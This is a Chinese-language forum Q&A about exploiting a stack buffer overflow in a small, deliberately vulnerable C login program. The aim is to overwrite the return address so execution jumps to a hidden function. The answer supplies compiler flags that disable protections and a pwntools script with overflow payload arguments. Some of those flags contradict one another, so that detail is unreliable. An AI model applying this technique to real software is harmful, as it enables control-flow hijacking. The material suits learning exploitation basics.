iT邦幫忙

1

有關buffer overflow 的問題

  • 分享至 

  • xImage

不會使用gdb對return address做更改
希望程式最後能導到myprivatetest()
以下為程式碼:

#include <stdio.h>
#include <string.h>

int UPtest(char *, char *,  char *);
void myprivatetest(void);

int main(int argc, char**argv){

  if(UPtest(argv[1], argv[2], argv[3])){
    printf("Access granted...\n");
  } else {
    printf("Wrong username and password!!!!\n");
  }
  return 0;
}

int UPtest(char *a1 , char *a2, char *a3){

  char Uid[29], Uname[27], Upass[72];
  strcpy(Uid, a1);
  strcpy(Uname, a2);
  strcpy(Upass, a3);

if(!strcmp(Uname, "Admin") && !strcmp(Upass, "PassAd007"))
     return 1;
else
     return 0;
}

void myprivatetest(){
printf("This is test code to run other system program.\n");
system("/usr/bin/xeyes");
}

printf("Access granted...\n");
myprivatetest();
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

1 個回答

0

看起來你想要通過 buffer overflow 通過覆蓋 return address 去跳轉到 myprivatetest,想法上應該是蓋掉 rip 暫存器就可以了,我先用 gdb 找到的 myprivatetest 的記憶體地址,這個地址就是要放到 rip 暫存器裡面的值,使用以下指令編譯

all:
	gcc -o test test.c -fno-stack-protector -no-pie -z execstack -z noexecstack -z norelro -z now -z relro

接著使用以下腳本

import subprocess
from pwn import *
from pwnlib.tubes.process import * 

target = b'\xc5\x12@'
print(target)
arg1 = b"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ"
arg2 = b"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMOOOOPPPPQQQQRRRRSSSS" + target
arg3 = b"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ"

args = ["gdb", "-args", "test", arg1, arg2, arg3]
context.terminal = ['tmux','splitw','-h']
subprocess.run(args)

效果為以下展示

希望有幫到~

我要發表回答

立即登入回答